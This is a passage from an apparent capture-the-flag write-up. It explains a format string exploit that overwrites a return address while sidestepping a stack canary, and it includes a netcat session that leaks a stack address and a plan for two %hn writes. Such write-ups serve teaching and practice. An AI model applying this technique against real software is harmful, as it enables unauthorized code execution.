The stack canary is at offset 64 and the return address is at offset 72. Therefore, we cannot use buffer overflow exploit to overwrite them. However, it uses printf to print our string back and we can use format string exploit to directly overwrite the return address without touching to the stack canary. Normally, we need a leak to know the stack address of the return address. However, the description of the challenge says ASLR is disabled on the server which means the addresses are always the same. We can use it to calculate the address before we create our exploit.

Let’s put a breakpoint on the printf call and examine the stack again.

At the offset 108, we see our return address which is 0xffffd2bc. At the offset 84, there is an address 0xffffd2c0 which is the 21th argument of the printf call. Now, we can leak this address from the server manually and calculate the return address by subtracting 4 from it.

1

2

3

4

5

$nc18.223.228.5213337

Someone told me that pwning makes noxāle...

But.........how????

0x%21$08x

0xffffdd30

Now, we know the return address is at 0xffffdd2c. We need to change the return address to 0x0804867b. We will achieve this using %hn specifier twice. First, we will write 0x867b to 0xffffdd2c, then we will write 0x0804 to 0xffffdd2e.